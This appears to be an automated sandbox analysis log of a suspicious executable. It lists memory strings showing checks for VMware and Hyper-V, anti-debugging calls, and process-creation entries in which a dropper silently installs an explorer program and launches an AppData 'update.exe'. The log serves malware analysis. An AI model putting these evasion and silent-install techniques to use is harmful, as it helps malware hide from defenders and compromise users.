                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F6F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None
                    Source: ETVk1yP43q.exe, 00000000.00000003.1778470634.0000000004BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2954474663.0000000003D5C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #6r
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2603877422.00000000052EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2655862972.0000000005340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae
                    Source: ChameleonExplorer.exe, 00000004.00000003.1778603692.0000000003D04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: re-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 8VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022......
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 8VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022....NVD slot #26.NVD slot #26...Tt.................................................................................NVD slot #27.NVD slot #27...Tu.................................................................................NVD slot #28.NVD slot #28...Tv.................................................................................NVD slot #29.NVD slot #29...Tw.................................................................................NVD slot #30.NVD slot #30...Tx.................................................................................NVD slot #31.NVD slot #31...Ty.................................................................................NVD slot #32.NVD slot #32...Tz.................................................................................NVD slot #33.NVD slot #33...T{.................................................................................NVD slot #34.NVD slot #34...T|.................................................................................NVD slot #35.NVD slot #35...T}.................................................................................NVD slot #36.NVD slot #36...T~.................................................................................NVD slot #37.NVD slot #37...T..................................................................................NVD slot #38.NVD slot #38...T..................................................................................NVD slot #39.NVD slot #39...T..................................................................................NVD slot #40.NVD slot #40...T..................................................................................NVD slot #41.NVD slot #41...T..................................................................................NVD slot #42.NVD slot #42...T..................................................................................NVD slot #43.NVD slot #43...T..................................................................................NVD slot #44.NVD slot #44...T..................................................................................NVD slot #45.NVD slot #45...T..................................................................................NVD slot #46.NVD slot #46...T..................................................................................NVD slot #47.NVD slot #47...T..................................................................................NVD slot #48.NVD slot #48...T..................................................................................NVD slot #49.NVD slot #49...T..................................................................................NVD slot #50.NVD slot #50...T..................................................................................NVD slot #51.NVD slot #51...T..................................................................................NVD slot #52.NVD slot #52...T........................
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2682002936.00000000052DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2773686051.0000000006B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES137
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1973013811.00000000016BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-56 4d
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2873573699.0000000005315000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBR
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1978831918.0000000003F1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FDF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..........
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2960846322.00000000051F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: neVMware-56 4d 43 71 48 15 3d ed-ae e6 t
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F37000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Z#$prg$explorer#$type$trial#$ver$pro#$name$#$mail$#$date$02.02.2025#$hid$6E19BE071648A2A9#$ f0.VMware,1...
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F37000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 25#$hid$6E19BE071648A2A9#$ f0.VMware,1...
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1976606200.0000000003ED1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware%
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2472380344.00000000052BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1976606200.0000000003ED1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.2211211842!
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2356525260.000000000528F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.2082922
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2524980280.00000000052B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001
                    Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000004.00000002.1831169359.0000000001468000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1881508466.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1889517245.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.2027394233.0000000003F82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.00000000068F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.2
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2622200268.00000000052E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f#
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2103152178.0000000005253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2922270437.0000000005340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, I
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1881508466.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014A4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1889517245.00000000014A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2531677539.00000000052B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virt
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2519969070.00000000052C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.
                    Source: ChameleonExplorer.exe, 00000004.00000003.1775888949.0000000003D01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1976606200.0000000003ED1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware%
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2245992714.0000000005263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B6
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1975888523.00000000016C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a ec d9 3b f0VMware20,1
                    Source: cexplorer.tmp, 00000002.00000003.1941924266.0000000000763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oj
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1881508466.0000000001494000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F29000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 8VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2405817753.0000000005289000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2954474663.0000000003D5C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #6r
                    Source: ChameleonExplorer.exe, 00000004.00000003.1784725259.00000000014FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 00000004.00000003.1777634471.00000000014FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware,
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2918029112.0000000006BD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1889517245.00000000014A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2954474663.0000000003CDD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.........P.P.|.@.....P...P...L1 CACHE.............|.@.............L2 CACHE.............|.@.............L3 CACHE...0..................s.s.A.............$.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...( .....................................RAM slot #7.RAM slot #7...(!.....................................RAM slot #8.RAM slot #8...(".....................................RAM slot #9.RAM slot #9...(#.....................................RAM slot #10.RAM slot #10...($.....................................RAM slot #11.RAM slot #11...(%.....................................RAM slot #12.RAM slot #12...(&.....................................RAM slot #13.RAM slot #1
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.00000000068F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2705794028.0000000005366000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.00000000068F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.Q
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.0000000006925000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: G..........................VMware, Inc..VMW201.00V.20829224.B64.22112118
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2124391410.0000000005202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.V
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.0000000006940000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.40 GHz
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2910920140.0000000006BCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2089915677.0000000005251000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-5
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1976724503.0000000001685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2668005016.00000000052E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2495718047.00000000052B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2251843600.000000000525C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2048081260.00000000051FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2876513835.0000000006BD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2431025620.000000000528D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.2
                    Source: ChameleonExplorer.exe, 00000004.00000003.1777634471.00000000014FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2610909014.000000000533C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2902133677.0000000006BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e
                    Source: ChameleonExplorer.exe, 0000000F.00000003.1972458417.00000000016B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0R
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2934722928.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.1979014685.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.1973121727.0000000001685000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.1980218916.00000000016B3000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000F.00000003.1972544714.0000000001685000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2941663421.0000000002F37000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW201.00V.20829224.B64.2211211842.11/21/2022..........VMCqH.=....Z..;....VMware, Inc..None.VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0.VMware20,1...
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1886328902.00000000014DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.22112118426
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2773167616.0000000005362000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.000000000303F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1.RangeException\CurVer
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2920370385.0000000006BD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2902133677.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 4
                    Source: ChameleonExplorer.exe, 0000000F.00000002.2961914587.00000000068F8000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware20,1@
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2664157391.0000000005344000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-a
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2186689308.0000000005235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002F9E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .......PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...( .....................................RAM slot #7.RAM slot #7...(!.....................................RAM slot #8.RAM slot #8...(".....................................RAM slot #9.RAM slot #9...(#.....................................RAM slot #10.RAM slot #10...($.....................................RAM slot #11.RAM slot #11...(%.....................................RAM slot #12.RAM slot #12...(&.....................................RAM slot #13.RAM slot #1
                    Source: ChameleonExplorer.exe, 00000004.00000003.1828228472.0000000002FA5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .......PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...( .....................................RAM slot #7.RAM slot #7...(!.....................................RAM slot #8.RAM slot #8...(".....................................RAM slot #9.RAM slot #9...(#.....................................RAM slot #10.RAM slot #10...($.....................................RAM slot #11.RAM slot #11...(%.....................................RAM slot #12.RAM slot #12...(&.....................................RAM slot #13.RAM slot #1#14
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2565637552.00000000052E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW20
                    Source: update.exe, 00000015.00000003.2482146112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, update.exe, 00000015.00000003.2470147501.0000000000792000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                    Source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 13
                    Source: ChameleonExplorer.exe, 0000000F.00000003.2910681278.000000000533A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpAPI call chain: ExitProcess graph end nodegraph_2-27247
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeAPI call chain: ExitProcess graph end nodegraph_20-7451
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeCode function: 0_2_00415B09 IsDebuggerPresent,0_2_00415B09
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeCode function: 0_2_00415CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00415CCC
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_004162B0 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,GetCurrentProcessId,21_2_004162B0
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00417236 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,21_2_00417236
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A2460 mov eax, dword ptr fs:[00000030h]3_2_007A2460
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A11FC mov eax, dword ptr fs:[00000030h]3_2_007A11FC
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A11EF mov eax, dword ptr fs:[00000030h]3_2_007A11EF
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A0FB7 mov eax, dword ptr fs:[00000030h]3_2_007A0FB7
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A1180 mov eax, dword ptr fs:[00000030h]3_2_007A1180
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00407AF0 mov eax, dword ptr fs:[00000030h]21_2_00407AF0
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_006011EF mov eax, dword ptr fs:[00000030h]21_2_006011EF
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_006011FC mov eax, dword ptr fs:[00000030h]21_2_006011FC
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00601180 mov eax, dword ptr fs:[00000030h]21_2_00601180
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00602460 mov eax, dword ptr fs:[00000030h]21_2_00602460
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00600FB7 mov eax, dword ptr fs:[00000030h]21_2_00600FB7
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeCode function: 0_2_0040A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A395
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-Jump to behavior
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 394276Jump to behavior
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                    Source: ETVk1yP43q.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
